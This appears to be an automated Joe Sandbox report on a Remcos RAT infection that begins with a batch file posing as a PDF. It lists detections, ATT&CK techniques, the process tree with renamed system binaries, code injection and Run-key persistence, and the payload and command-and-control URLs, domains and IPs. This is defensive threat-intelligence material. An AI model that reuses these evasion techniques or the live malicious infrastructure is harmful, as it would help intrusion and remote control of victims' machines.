              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              Source: Yara match | File source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000019.00000002.1714791876.0000000000647000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000017.00000002.1661654615.000000002AB37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: AnyDesk.PIF PID: 7748, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 8072, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 5612, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 7296, type: MEMORYSTR

              Remote Access Functionality

              Source: C:\Windows\SysWOW64\SndVol.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-H5EBMC
              Source: C:\Windows\SysWOW64\SndVol.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-H5EBMC
              Source: C:\Windows\SysWOW64\SndVol.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-H5EBMC
              Source: Yara match | File source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000019.00000002.1714791876.0000000000647000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000017.00000002.1661654615.000000002AB37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: AnyDesk.PIF PID: 7748, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 8072, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 5612, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 7296, type: MEMORYSTR
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FC3E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,7_2_00007FF68FC3E568
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FC2227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,7_2_00007FF68FC2227C
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FC45648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,7_2_00007FF68FC45648
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FC254A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,7_2_00007FF68FC254A0
              MITRE ATT&CK Matrix (the matrix table was flattened during extraction; its tactic columns are Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). Technique cells that carry a signature-count badge, listed with the badge digits exactly as extracted (a multi-digit badge is presumably several per-severity counts run together; column position is not preserved):

              Scripting (1, two cells); Valid Accounts (2, four cells); Native API (1); DLL Side-Loading (1, three cells); Disable or Modify Tools (2); System Time Discovery (1); Archive Collected Data (12); Ingress Tool Transfer (1); Data Encrypted for Impact (1); Deobfuscate/Decode Files or Information (1); Account Discovery (1); Encrypted Channel (2); Access Token Manipulation (21, two cells); Obfuscated Files or Information (12); System Network Connections Discovery (1); Non-Standard Port (1); Registry Run Keys / Startup Folder (1, two cells); Process Injection (312, two cells); Install Root Certificate (1); File and Directory Discovery (1); Remote Access Software (1); Timestomp (1); System Information Discovery (46); Non-Application Layer Protocol (2); Security Software Discovery (241); Application Layer Protocol (212); Masquerading (311); Virtualization/Sandbox Evasion (2, two cells); Process Discovery (1); Application Window Discovery (1); System Owner/User Discovery (1).
              Behavior Graph (ID: 1559105; process tree reconstructed from the flattened graph text)
              Sample: USD470900_COPY_800BLHSBC882... | Startdate: 20/11/2024 | Architecture: WINDOWS | Score: 100

              Sample-level network: iamblessed.duckdns.org (Uses dynamic DNS services); ferreiragascuritiba.com.br; geoplugin.net
              Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures

              Process tree:
              cmd.exe
                  AnyDesk.PIF
                      network: ferreiragascuritiba.com.br 216.172.172.178, 49706, 49707, 80, UNIFIEDLAYER-AS-1US, United States
                      dropped: C:\Users\Public\Libraries\Faogvkgh (data); C:\Users\Public\Faogvkgh.url (MS)
                      signatures: Multi AV Scanner detection for dropped file; Early bird code injection technique detected; Machine Learning detection for dropped file; 3 other signatures
                      cmd.exe
                          esentutl.exe
                              dropped: C:\Users\Public\alpha.pif (PE32)
                              signatures: Drops PE files to the user root directory; Drops PE files with a suspicious file extension; Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                          esentutl.exe
                              dropped: C:\Users\Public\xpha.pif (PE32)
                          conhost.exe
                      SndVol.exe
                          network: iamblessed.duckdns.org 77.221.149.38, 47666, 49709, INFOBOX-ASInfoboxruAutonomousSystemRU, Russian Federation; 127.0.0.1 (unknown); geoplugin.net 178.237.33.50, 49710, 80, ATOM86-ASATOM86NL, Netherlands
                          signatures: Detected Remcos RAT
                      esentutl.exe
                          dropped: C:\Users\Public\Libraries\Faogvkgh.PIF (PE32)
                          conhost.exe
                  extrac32.exe
                      dropped: C:\Users\Public\alpha.exe (PE32+)
                      signatures: Drops PE files to the user root directory; Drops or copies certutil.exe with a different name (likely to bypass HIPS); Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                  alpha.exe
                      kn.exe
                          signatures: Registers a new ROOT certificate; Drops PE files with a suspicious file extension
                  5 other processes
                      kn.exe
                          dropped: C:\Users\Public\Libraries\AnyDesk.PIF (PE32)
                      extrac32.exe
                          dropped: C:\Users\Public\kn.exe (PE32+)
              Faogvkgh.PIF
                  signatures: Multi AV Scanner detection for dropped file; Early bird code injection technique detected; Machine Learning detection for dropped file
                  SndVol.exe
                      signatures: Detected Remcos RAT
              Faogvkgh.PIF
                  signatures: Allocates memory in foreign processes
                  SndVol.exe

              Source | Detection | Scanner | Label
              USD470900_COPY_800BLHSBC882001.PDF.bat | 18% | ReversingLabs | Script-BAT.Trojan.Remcos

              Source | Detection | Scanner | Label
              C:\Users\Public\Libraries\AnyDesk.PIF | 100% | Joe Sandbox ML |
              C:\Users\Public\Libraries\Faogvkgh.PIF | 100% | Joe Sandbox ML |
              C:\Users\Public\Libraries\AnyDesk.PIF | 32% | ReversingLabs | Win32.Trojan.Generic
              C:\Users\Public\Libraries\Faogvkgh.PIF | 32% | ReversingLabs | Win32.Trojan.Generic
              C:\Users\Public\alpha.exe | 0% | ReversingLabs |
              C:\Users\Public\alpha.pif | 0% | ReversingLabs |
              C:\Users\Public\kn.exe | 0% | ReversingLabs |
              C:\Users\Public\xpha.pif | 0% | ReversingLabs |
              No Antivirus matches
              No Antivirus matches

              Source | Detection | Scanner | Label
              http://ferreiragascuritiba.com.br/v/233_Faogvkghvqn | 0% | Avira URL Cloud | safe
              http://ferreiragascuritiba.com.br/v/233_Faogvkghvqnath | 0% | Avira URL Cloud | safe
              http://ferreiragascuritiba.com.b | 0% | Avira URL Cloud | safe
              iamblessed.duckdns.org | 0% | Avira URL Cloud | safe
              http://ferreiragascuritiba.com.br/ | 0% | Avira URL Cloud | safe
              http://ferreiragascuritiba.com.br:80/v/233_FaogvkghvqnP | 0% | Avira URL Cloud | safe
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              iamblessed.duckdns.org | 77.221.149.38 | true | true | | unknown
              ferreiragascuritiba.com.br | 216.172.172.178 | true | true | | unknown
              geoplugin.net | 178.237.33.50 | true | false | | high

              Name | Malicious | Antivirus Detection | Reputation
              iamblessed.duckdns.org | true | Avira URL Cloud: safe | unknown
              http://ferreiragascuritiba.com.br/v/233_Faogvkghvqn | true | Avira URL Cloud: safe | unknown
              http://geoplugin.net/json.gp | false | | high
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | false | | high
              https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP | kn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr | false | | high
              https://login.microsoftonline.com/%s/oauth2/authorize | kn.exe | false | | high
              https://sectigo.com/CPS0 | AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | false | | high
              https://login.microsoftonline.com/%s/oauth2/token | kn.exe | false | | high
              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | false | | high
              http://geoplugin.net/json.gpl:H | SndVol.exe, 00000014.00000002.3879565990.000000001C158000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1535801300.000000001C158000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://ocsp.sectigo.com0 | AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | false | | high
              http://ferreiragascuritiba.com.br/v/233_Faogvkghvqnath | AnyDesk.PIF, 0000000A.00000002.1493586816.000000000080E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | false | | high
              http://ferreiragascuritiba.com.br:80/v/233_FaogvkghvqnP | AnyDesk.PIF, 0000000A.00000002.1493586816.000000000088D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | false | | high
              http://ferreiragascuritiba.com.br/ | AnyDesk.PIF, 0000000A.00000002.1493586816.0000000000865000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
              https://enterpriseregistration.windows.net/EnrollmentServer/key/ | kn.exe | false | | high
              http://geoplugin.net/json.gpSystem32 | SndVol.exe, 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah | kn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr | false | | high
              http://geoplugin.net/ | SndVol.exe, 00000014.00000003.1535801300.000000001C176000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1537139558.000000001C187000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://geoplugin.net/json.gp/C | AnyDesk.PIF, 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp | false | | high
              http://geoplugin.net/json.gpfH5 | SndVol.exe, 00000014.00000002.3879565990.000000001C158000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1535801300.000000001C158000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://geoplugin.net/json.gp.(K | SndVol.exe, 00000014.00000002.3879565990.000000001C158000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1535801300.000000001C158000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://ferreiragascuritiba.com.b | AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020B1D000.00000004.00001000.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
              https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc | kn.exe | false | | high
              http://www.pmail.com | AnyDesk.PIF, AnyDesk.PIF, 0000000A.00000002.1497237334.0000000002B93000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427109635.0000000002B97000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427511863.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1498326441.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1523550345.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, Faogvkgh.PIF, 00000016.00000002.1647310662.0000000002DA2000.00000004.00001000.00020000.00000000.sdmp, Faogvkgh.PIF, 00000018.00000002.1717002790.0000000002E42000.00000004.00001000.00020000.00000000.sdmp | false | | high
              https://%ws/%ws_%ws_%ws/service.svc/%ws | kn.exe | false | | high
              https://enterpriseregistration.windows.net/EnrollmentServer/device/ | kn.exe | false | | high
              http://ocsp.sectigo.com0C | AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | false | | high
              IP | Domain | Country | ASN | ASN Name | Malicious
              77.221.149.38 | iamblessed.duckdns.org | Russian Federation | 30968 | INFOBOX-ASInfoboxruAutonomousSystemRU | true
              216.172.172.178 | ferreiragascuritiba.com.br | United States | 46606 | UNIFIEDLAYER-AS-1US | true
              178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false

              IP (private/local)
              127.0.0.1
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1559105
                                                                  Start date and time:2024-11-20 07:52:12 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 11m 12s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:29
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:USD470900_COPY_800BLHSBC882001.PDF.bat
                                                                  Detection:MAL
                                                                  Classification:mal100.bank.troj.evad.winBAT@41/22@3/4
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 59
                                                                  • Number of non-executed functions: 208
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .bat
                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: USD470900_COPY_800BLHSBC882001.PDF.bat
Time | Type | Description
01:53:10 | API Interceptor | 2x Sleep call for process: AnyDesk.PIF modified
01:53:30 | API Interceptor | 2x Sleep call for process: Faogvkgh.PIF modified
01:53:53 | API Interceptor | 4280827x Sleep call for process: SndVol.exe modified
07:53:21 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Faogvkgh C:\Users\Public\Faogvkgh.url
07:53:29 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Faogvkgh C:\Users\Public\Faogvkgh.url
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
178.237.33.50 | globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | file.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | YYHh9QU804.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | geoplugin.net/json.gp
178.237.33.50 | FRSSDE.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Order_Summary.xls | malicious | Remcos, HTMLPhisher | geoplugin.net/json.gp
178.237.33.50 | ungziped_file.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | rBankRemittance_pdf.scr.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | download.exe | malicious | Remcos, XWorm | geoplugin.net/json.gp
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
iamblessed.duckdns.org | zYJYK66EGb.exe | malicious | Remcos | 103.186.116.195
geoplugin.net | globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | file.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | YYHh9QU804.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 178.237.33.50
geoplugin.net | FRSSDE.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | Order_Summary.xls | malicious | Remcos, HTMLPhisher | 178.237.33.50
geoplugin.net | ungziped_file.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbs | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | rBankRemittance_pdf.scr.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | download.exe | malicious | Remcos, XWorm | 178.237.33.50
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
UNIFIEDLAYER-AS-1, US | New Order - RCII900718_Contract Drafting.exe | malicious | FormBook | 108.179.253.197
UNIFIEDLAYER-AS-1, US | arm7.nn-20241120-0508.elf | malicious | Mirai, Okiru | 162.144.165.86
UNIFIEDLAYER-AS-1, US | http://www.dvdcollections.co.uk/search/redirect.php?deeplink=https://lp-engenharia.com/zerooo/?email=mwright@burbankca.gov | malicious | HTMLPhisher | 50.116.87.139
UNIFIEDLAYER-AS-1, US | http://volunteeraudio.com | malicious | Unknown | 162.144.112.69
UNIFIEDLAYER-AS-1, US | https://t.ly/9nPyg | malicious | Unknown | 192.254.189.167
UNIFIEDLAYER-AS-1, US | Gherrera_Revised_Record_Adjustment_Antamina_Required_Signature.docx.doc | malicious | Unknown | 162.241.225.120
UNIFIEDLAYER-AS-1, US | https://docsend.com/view/8bzvs74qq8k89vmw | malicious | Unknown | 162.241.60.177
UNIFIEDLAYER-AS-1, US | https://online-e.net/st-manager/click/track?id=795&type=raw&url=https://msc-mu.com/apikey-tyudqnhzdgevhdbasx/secure-redirect%23Darth.Vader%2BDeathStar.com&source_url=https%3A%2F%2Fonline-e.net%2Feven-if-even-though%2F&source_title=Even%20if%E3%81%A8Even%20though | malicious | Unknown | 108.167.158.52
UNIFIEDLAYER-AS-1, US | http://palmbeachhydroflight.com/ | malicious | Unknown | 162.241.224.56
UNIFIEDLAYER-AS-1, US | file.exe | malicious | Remcos | 69.49.234.173
INFOBOX-ASInfoboxruAutonomousSystem, RU | YDW0S5K7hi.exe | malicious | SilverRat | 109.120.138.54
INFOBOX-ASInfoboxruAutonomousSystem, RU | cDRgXaadjD.exe | malicious | SilverRat | 109.120.138.220
INFOBOX-ASInfoboxruAutonomousSystem, RU | botnet.x86.elf | malicious | Mirai, Moobot | 92.243.83.22
INFOBOX-ASInfoboxruAutonomousSystem, RU | boatnet.arm.elf | malicious | Mirai | 77.221.151.63
INFOBOX-ASInfoboxruAutonomousSystem, RU | boatnet.mips.elf | malicious | Mirai | 77.221.151.63
INFOBOX-ASInfoboxruAutonomousSystem, RU | boatnet.x86.elf | malicious | Mirai | 77.221.151.63
INFOBOX-ASInfoboxruAutonomousSystem, RU | boatnet.ppc.elf | malicious | Mirai | 77.221.151.63
INFOBOX-ASInfoboxruAutonomousSystem, RU | boatnet.sh4.elf | malicious | Mirai | 77.221.151.63
INFOBOX-ASInfoboxruAutonomousSystem, RU | boatnet.arm7.elf | malicious | Mirai | 77.221.151.63
INFOBOX-ASInfoboxruAutonomousSystem, RU | boatnet.spc.elf | malicious | Mirai | 77.221.151.63
ATOM86-ASATOM86, NL | globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86, NL | file.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86, NL | YYHh9QU804.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86, NL | seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 178.237.33.50
ATOM86-ASATOM86, NL | FRSSDE.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86, NL | Order_Summary.xls | malicious | Remcos, HTMLPhisher | 178.237.33.50
ATOM86-ASATOM86, NL | ungziped_file.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86, NL | DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbs | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86, NL | rBankRemittance_pdf.scr.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86, NL | download.exe | malicious | Remcos, XWorm | 178.237.33.50
                                                                  No context
Match (Dropped File) | Associated Sample Name / URL | Detection | Threat Name
C:\Users\Public\alpha.exe | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer
C:\Users\Public\alpha.exe | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer
C:\Users\Public\alpha.exe | Árajánlat kérés 12·11·2024·Pdf.cmd | malicious | Unknown
C:\Users\Public\alpha.exe | Árajánlat kérés 06.11.2024.cmd | malicious | DBatLoader, FormBook
C:\Users\Public\alpha.exe | TZH3Uk8x45.bat | malicious | DBatLoader, PureLog Stealer, XWorm
C:\Users\Public\alpha.exe | Payment.cmd | malicious | Azorult, DBatLoader
C:\Users\Public\alpha.exe | FACTURA.cmd | malicious | DBatLoader
C:\Users\Public\alpha.exe | rPO767575.cmd | malicious | DBatLoader
C:\Users\Public\alpha.exe | Contact Form and Delivery Details ,pdf.cmd | malicious | DBatLoader, FormBook
C:\Users\Public\alpha.exe | Duclot Collections.bat | malicious | Remcos, DBatLoader
                                                                                      Process:C:\Users\Public\kn.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
